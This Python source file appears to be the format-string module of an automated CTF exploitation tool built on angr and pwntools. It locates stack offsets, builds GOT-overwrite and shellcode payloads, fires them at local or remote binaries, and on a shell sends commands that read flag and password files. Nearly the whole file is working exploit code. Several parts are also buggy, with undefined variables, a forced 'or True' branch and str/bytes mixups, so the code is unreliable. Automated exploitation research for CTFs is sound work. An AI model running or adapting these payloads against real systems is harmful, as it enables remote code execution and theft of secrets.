import angr
from pwn import *
from zeratool import printf_model
from .overflowExploiter import getRegValues, findShellcode
from .simgr_helper import getShellcode
import timeout_decorator
import time
import string


def exploitFormat(binary_name, properties):

    exploit_results = {}
    exploit_results["flag_found"] = False

    input_pos = properties["pwn_type"]["position"]
    input_len = properties["pwn_type"]["length"]
    input_string = properties["pwn_type"]["input"]

    # Slice constrolled input
    start_slice = input_string[:input_pos]
    end_slice = input_string[input_pos + input_len :]

    format_specifier = b"lx"
    format_prefix = b"aaaa_%"
    if "amd64" in properties["protections"]["arch"]:
        format_specifier = b"llx"
        format_prefix = b"aaaaaaaa_%"

    stack_position = -1
    print("[~] Locating buffer stack location")
    # Determine stack location
    for i in range(1, 50):
        iter_byte = str(i).encode()
        iter_string = format_prefix+iter_byte+b"$"+format_specifier+b"_"
        iter_string = assembleInput(iter_string, start_slice, end_slice, input_len)
        print(iter_string)
        results = runIteration(
            binary_name, iter_string, input_type=properties["input_type"]
        )
        if b"61616161" in results:  # 0x41414141 == "AAAA"
            stack_position = i
            print("[+] Found stack location at {}".format(stack_position))
            break

    if len(properties["win_functions"]) > 0:
        for func in properties["win_functions"]:
            address = properties["win_functions"][func]["fcn_addr"]
            for got_name, got_addr in list(properties["protections"]["got"].items()):
                print("[~] Overwritting {}".format(got_name))
                writes = {got_addr: address}
                format_payload = fmtstr_payload(
                    stack_position, writes, numbwritten=input_pos
                )
                if len(format_payload) > input_len or True:
                    print("[~] Format input to large, shrinking")
                    format_payload = fmtstr_payload(
                        stack_position,
                        writes,
                        numbwritten=input_pos,
                        write_size="short",
                    )

                format_input = assembleInput(
                    format_payload, start_slice, end_slice, input_len
                )

                print(repr(format_input))
                results = sendExploit(binary_name, properties, format_input)
                if results["flag_found"]:
                    exploit_results["flag_found"] = results["flag_found"]
                    exploit_results["input"] = format_input
                    return exploit_results
        return exploit_results
    elif not properties["protections"]["nx"]:
        print("[+] Binary does not have NX")
        print("[+] Overwriting GOT entry to point to shellcode")
        rediscoverAndExploit(binary_name, properties, stack_position)
    else:
        print("[+] Overwriting GOT entry to point to one gadget RCE")


"""
Run until we hit our hooked printf.
Constrain input to crafted string:
    String = (Format GOT Write) + (Shellcode)
"""


def rediscoverAndExploit(binary_name, properties, stack_position):

    properties["shellcode"] = getShellcode(properties)
    properties["stack_position"] = stack_position
    inputType = properties["input_type"]

    # p = angr.Project(binary_name,load_options={"auto_load_libs": False})
    p = angr.Project(binary_name)

    p.hook_symbol("printf", printFormatSploit())

    # Setup state based on input type
    argv = [binary_name]
    if inputType == "STDIN":
        """
        angr doesn't use the right base and stack pointers
        when loading the binary, so our addresses are all wrong.
        So we need to grab them manually
        """
        entryAddr = p.loader.main_object.entry
        reg_values = getRegValues(binary_name, entryAddr)
        state = p.factory.full_init_state(args=argv)

        register_names = list(state.arch.register_names.values())
        for register in register_names:
            if register in reg_values:  # Didn't use the register
                state.registers.store(register, reg_values[register])

    elif inputType == "LIBPWNABLE":
        handle_connection = p.loader.main_object.get_symbol("handle_connection")
        state = p.factory.entry_state(addr=handle_connection.rebased_addr)
    else:
        arg = claripy.BVS("arg1", 300 * 8)
        argv.append(arg)
        state = p.factory.full_init_state(args=argv)
        state.globals["arg"] = arg

    state.globals["inputType"] = inputType
    state.globals["properties"] = properties
    simgr = p.factory.simgr(state)

    run_environ = {}
    run_environ["type"] = None
    end_state = None
    # Lame way to do a timeout
    try:

        @timeout_decorator.timeout(1200)
        def exploreBinary(simgr):
            simgr.explore(find=lambda s: "type" in s.globals)

        exploreBinary(simgr)
        if "found" in simgr.stashes and len(simgr.found):
            end_state = simgr.found[0]
            run_environ["type"] = end_state.globals["type"]
            run_environ["position"] = end_state.globals["position"]
            run_environ["length"] = end_state.globals["length"]

    except (KeyboardInterrupt, timeout_decorator.TimeoutError) as e:
        print("[~] Format check timed out")
    if (inputType == "STDIN" or inputType == "LIBPWNABLE") and end_state is not None:
        stdin_str = str(end_state.posix.dumps(0))
        print("[+] Triggerable with STDIN : {}".format(stdin_str))
        run_environ["input"] = stdin_str
    elif inputType == "ARG" and end_state is not None:
        arg_str = str(end_state.solver.eval(arg, cast_to=str))
        run_environ["input"] = arg_str
        print("[+] Triggerable with arg : {}".format(arg_str))

    return run_environ

    pass


class printFormatSploit(angr.procedures.libc.printf.printf):
    IS_FUNCTION = True

    def checkExploitable(self):
        """
        For each value passed to printf
        Check to see if there are any symbolic bytes
        Passed in that we control
        """
        for i in range(5):

            if "properties" not in self.state.globals:
                print("[-] Missing properties in globals!")
                exit(0)

            properties = self.state.globals["properties"]

            state_copy = self.state.copy()

            solv = state_copy.solver.eval

            printf_arg = self.arg(i)

            var_loc = solv(printf_arg)  # Assume it's a pointer

            if var_loc == 0:
                print("[-] Value at stack offset {} not a pointer".format(i))
                continue

            var_value = state_copy.memory.load(var_loc)

            var_value_length = int("0x" + str(var_value.length), 16)

            symbolic_list = [
                state_copy.memory.load(var_loc + x).get_byte(0).symbolic
                for x in range(var_value_length)
            ]

            """
            Iterate over the characters in the string
            Checking for where our symbolic values are
            This helps in weird cases like:

            char myVal[100] = "I\'m cool ";
            strcat(myVal,STDIN);
            printf("My super cool string is %s",myVal);                                                                                   """
            position = 0
            count = 0
            greatest_count = 0
            prev_item = symbolic_list[0]
            for sym_i in range(1, len(symbolic_list)):
                if (
                    symbolic_list[sym_i]
                    and symbolic_list[sym_i] == symbolic_list[sym_i - 1]
                ):
                    count = count + 1
                    if count > greatest_count:
                        greatest_count = count
                        position = sym_i - count
                else:
                    if count > greatest_count:
                        greatest_count = count
                        position = sym_i - 1 - count
                        # previous position minus greatest count
                    count = 0
            print(
                "[+] Found symbolic buffer at position {} of length {}".format(
                    position, greatest_count
                )
            )

            if greatest_count > 0:
                shellcode = properties["shellcode"]
                stack_pos = properties["stack_position"]

                for got_name, got_addr in list(
                    properties["protections"]["got"].items()
                ):
                    #                for got_name,got_addr in [(x,y) for (x,y) in properties['protections']['got'].items() if x in " exit"]: #debug for hard_format
                    backup_state = state_copy.copy()
                    print("[+] Overwiting {} at {}".format(got_name, hex(got_addr)))

                    solv = state_copy.solver.eval

                    # Mock write to get approx length
                    buffer_address = var_loc + position
                    writes = {got_addr: buffer_address}  # Begining of buffer
                    format_write = fmtstr_payload(
                        stack_pos, writes, numbwritten=position, write_size="short"
                    )
                    write_len = len(format_write)

                    # Real write
                    buffer_address = var_loc + position + write_len
                    writes = {got_addr: buffer_address}
                    format_write = fmtstr_payload(
                        stack_pos, writes, numbwritten=position, write_size="short"
                    )

                    # Final payload
                    format_payload = format_write + shellcode.encode()

                    var_value_length = len(format_payload)
                    self.constrainBytes(
                        state_copy,
                        var_value,
                        var_loc,
                        position,
                        var_value_length,
                        strVal=format_payload,
                    )

                    print("[+] Format buffer at {}".format(hex(var_loc)))
                    print("[+] Shellcode located at {}".format(hex(buffer_address)))
                    print("[+] Format write:\n{}".format(repr(format_write)))
                    print("[+] Constructed payload:\n{}".format(repr(format_payload)))
                    print(
                        "[+] Constructed stdout:\n{}".format(
                            repr(
                                state_copy.posix.dumps(0)
                                .decode("utf-8", "ignore")
                                .rstrip("\x00")
                            )
                        )
                    )

                    vuln_string = solv(var_value, cast_to=bytes)

                    binary_name = state_copy.project.filename
                    results = {}
                    results["flag_found"] = False
                    print("[~] Testing payload")
                    results = sendExploit(
                        binary_name, properties, state_copy.posix.dumps(0)
                    )
                    if results["flag_found"] == True:
                        exploit_results["flag_found"] = results["flag_found"]
                        exploit_results["input"] = format_input
                    else:  # Maybe angr still messed up the pointer
                        print("[-] Payload launch failed. Fixing angr stack pointer")

                        # Find the last basic block executed

                        first_input = (
                            state_copy.posix.dumps(0)
                            .decode("utf-8", "ignore")
                            .rstrip("\x00")
                        )

                        end_eip = state_copy.se.eval(state_copy.regs.pc)

                        last_bb = [x for x in state_copy.history.bbl_addrs][-1]
                        last_bb_addr = last_bb  # int(last_bb.split(' ')[2].rstrip(':'),16) #I'm sorry I'm parsing like this

                        ret_location = findShellcode(
                            binary_name, last_bb_addr, shellcode, first_input
                        )

                        if len(ret_location) == 0:
                            print(
                                "[-] Unable to find shellcode location for corrected stack"
                            )
                            finish_pointer = False
                        else:
                            real_location = ret_location[0]["offset"]
                            finish_pointer = True

                        if finish_pointer:

                            state_copy = backup_state.copy()

                            solv = state_copy.solver.eval

                            printf_arg = self.arg(i)

                            var_loc = solv(printf_arg)  # Assume it's a pointer

                            if var_loc == 0:
                                print(
                                    "[-] Value at stack offset {} not a pointer".format(
                                        i
                                    )
                                )
                                continue

                            var_value = state_copy.memory.load(var_loc)

                            var_value_length = int("0x" + str(var_value.length), 16)

                            writes = {got_addr: real_location}
                            format_write = fmtstr_payload(
                                stack_pos,
                                writes,
                                numbwritten=position,
                                write_size="short",
                            )
                            format_payload = format_write + properties["shellcode"]
                            var_value_length = len(format_payload)
                            self.constrainBytes(
                                state_copy,
                                var_value,
                                var_loc,
                                position,
                                var_value_length,
                                strVal=format_payload,
                            )

                            print(
                                "[+] Shellcode located at {}".format(hex(real_location))
                            )
                            print(
                                "[+] Adjusted payload:\n{}".format(repr(format_payload))
                            )
                            print(
                                "[+] Constructed stdout:\n{}".format(
                                    repr(state_copy.posix.dumps(0).rstrip("\x00"))
                                )
                            )

                            with open("command.input", "w") as f:
                                f.write(state_copy.posix.dumps(0).rstrip("\x00"))

                            results_n = sendExploit(
                                binary_name,
                                properties,
                                state_copy.posix.dumps(0).rstrip("\x00"),
                            )
                            if results_n["flag_found"]:
                                print(
                                    "[+] Vulnerable path found {}".format(
                                        repr(state_copy.posix.dumps(0).rstrip("\x00"))
                                    )
                                )
                                self.state.globals["type"] = "Format"
                                self.state.globals["position"] = position
                                self.state.globals["length"] = greatest_count
                                return True

                                # exploit_results['flag_found'] = results_n['flag_found']
                                # exploit_results['input'] = format_input

                    # Verify solution
                    if (
                        state_copy.globals["inputType"] == "STDIN"
                        or state_copy.globals["inputType"] == "LIBPWNABLE"
                    ) and results_n["flag_found"]:
                        stdin_str = str(state_copy.posix.dumps(0))
                        if format_payload in stdin_str or results["flag_found"]:
                            var_value = self.state.memory.load(var_loc)
                            self.constrainBytes(
                                self.state,
                                var_value,
                                var_loc,
                                position,
                                var_value_length,
                                strVal=format_payload,
                            )
                            print("[+] Vulnerable path found {}".format(vuln_string))
                            self.state.globals["type"] = "Format"
                            self.state.globals["position"] = position
                            self.state.globals["length"] = greatest_count

                            return True
                    if state_copy.globals["inputType"] == "ARG":
                        arg = state.globals["arg"]
                        arg_str = str(state_copy.solver.eval(arg, cast_to=str))
                        if format_payload in arg_str:
                            var_value = self.state.memory.load(var_loc)
                            self.constrainBytes(
                                self.state,
                                var_value,
                                var_loc,
                                position,
                                var_value_length,
                                strVal=format_payload,
                            )
                            print("[+] Vulnerable path found {}".format(vuln_string))
                            self.state.globals["type"] = "Format"
                            self.state.globals["position"] = position
                            self.state.globals["length"] = greatest_count
                            return True
                    state_copy = backup_state.copy()

        return False

    def constrainBytes(self, state, symVar, loc, position, length, strVal="%x_"):
        for i in range(length):
            strValIndex = i % len(strVal)
            curr_byte = self.state.memory.load(loc + i).get_byte(0)
            constraint = state.se.And(strVal[strValIndex] == curr_byte)
            if state.se.satisfiable(extra_constraints=[constraint]):
                state.add_constraints(constraint)
            else:
                print(
                    "[~] Byte {} not constrained to {}".format(
                        i, repr(strVal[strValIndex])
                    )
                )

    def run(self):
        if not self.checkExploitable():
            return super(type(self), self).run()


def getRemoteFormat(properties, remote_url, remote_port):
    exploit_results = {}

    input_pos = properties["pwn_type"]["position"]
    input_len = properties["pwn_type"]["length"]
    input_string = properties["pwn_type"]["input"]

    # Slice constrolled input
    start_slice = input_string[:input_pos]
    end_slice = input_string[input_pos + input_len :]

    stack_position = -1
    print("[~] Locating buffer stack location")
    # Determine stack location
    for i in range(1, 50):
        iter_string = "AAAA_%{}$08x_".format(i)
        iter_string = assembleInput(iter_string, start_slice, end_slice, input_len)

        results = runIteration(
            None,
            iter_string,
            remote_server=True,
            remote_url=remote_url,
            remote_port=remote_port,
        )
        if "41414141" in results:  # 0x41414141 == "AAAA"
            stack_position = i
            print("[+] Found stack location at {}".format(stack_position))
            break

    if properties["win_functions"] is not None:
        for func in properties["win_functions"]:
            address = properties["win_functions"][func]["fcn_addr"]
            for got_name, got_addr in list(properties["protections"]["got"].items()):
                print("[~] Overwritting {}".format(got_name))
                writes = {got_addr: address}
                format_payload = fmtstr_payload(
                    stack_position, writes, numbwritten=input_pos
                )
                if len(format_payload) > input_len:
                    print("[~] Format input to large, shrinking")
                    format_payload = fmtstr_payload(
                        stack_position,
                        writes,
                        numbwritten=input_pos,
                        write_size="short",
                    )

                format_input = assembleInput(
                    format_payload, start_slice, end_slice, input_len
                )

                print(repr(format_input))
                results = sendExploit(
                    None,
                    properties,
                    format_input,
                    remote_server=True,
                    remote_url=remote_url,
                    port_num=remote_port,
                )
                if results["flag_found"]:
                    exploit_results["flag_found"] = results["flag_found"]
                    exploit_results["input"] = format_input
                    return exploit_results
        return exploit_results


"""
Maintain original input size
Change this later to use angr
And add these as constraints off a path
"""


def assembleInput(str_input, start_slice, end_slice, input_len):
    input_len
    str_len = len(str_input)
    for i in range(input_len - str_len):
        str_input += b"A"
    return start_slice + str_input + end_slice


def runIteration(
    binary_name,
    str_input,
    remote_server=False,
    remote_url="",
    remote_port=0,
    input_type="STDIN",
):

    if input_type == "STDIN" or input_type == "LIBPWNABLE":
        if remote_server:
            proc = remote(remote_url, remote_port)
        else:
            proc = process(binary_name)
        proc.sendline(str_input)

        results = proc.recvall(timeout=5)
        print(results)
        results_split = results.split(b"_")

        # Get only hex strings of 8 characters or fewer
        position_leak = [
            x
            for x in results_split
            if all([y in string.hexdigits.encode() for y in x])
        ]

        leak = list(filter(lambda x: (b"61616161" in x), position_leak))
        print(position_leak)
        if len(leak):
            return leak[0]
        return b""
        # There should only be one
        #leak = [position_leak][0]
    else:
        proc = process([binary_name, str_input.rstrip(b"\x00")])

        results = proc.recvall(timeout=5)
        print(results)
        results_split = results.split(b"_")

        # Get only hex strings of 8 characters or fewer
        position_leak = [
            x
            for x in results_split
            if all([y in string.hexdigits for y in x])
        ]

        # There should only be one
        leak = [position_leak][0]

    return leak


def sendExploit(
    binary_name,
    properties,
    input_string,
    remote_server=False,
    remote_url="",
    port_num=0,
):

    send_results = {}
    hadIssue = False

    if properties["input_type"] == "STDIN" or properties["input_type"] == "LIBPWNABLE":
        # Create local or remote process
        if remote_server:
            proc = remote(remote_url, port_num)
        else:
            proc = process(binary_name)

        proc.sendline(input_string)
        # print(repr(input_string))

        # Sometimes the flag is just printed
        results = proc.recvall(timeout=15)
    else:
        try:
            proc = process([binary_name, input_string])
        except:
            print("[-] Issue with nulls in arg")
            hadIssue = True

        # print(repr(input_string))

        # Sometimes the flag is just printed
    if not hadIssue:
        results = proc.recvall(timeout=15)

    print(results)
    send_results["flag_found"] = False
    if not hadIssue and b"{" in results and b"}" in results:
        send_results["flag_found"] = True
        print("[+] Flag found:")
        print(results.replace(b"\x20",b""))
    # Flag not in stdout, we have a shell
    else:

        if (
            properties["input_type"] == "STDIN"
            or properties["input_type"] == "LIBPWNABLE"
        ):
            if remote_server:
                proc = remote(remote_url, port_num)
            else:
                proc = process(binary_name)
            proc.sendline(input_string)
        else:
            try:
                proc = process([binary_name, input_string])
            except:
                print("[-] Issue with nulls in arg")

        try:
            proc.sendline()
            proc.sendline("ls;\n")
            proc.sendline("cat *flag*;\n")
            proc.sendline("cat *pass*;\n")
            command_results = proc.recvall(
                timeout=30
            )  # Need a better way to "time out"
            # print(command_results)
            if b"{" in command_results and b"}" in command_results:
                send_results["flag_found"] = True
                print("[+] Flag found:")
                print(command_results.replace(b"\x20",b""))
        except:
            pass

    return send_results
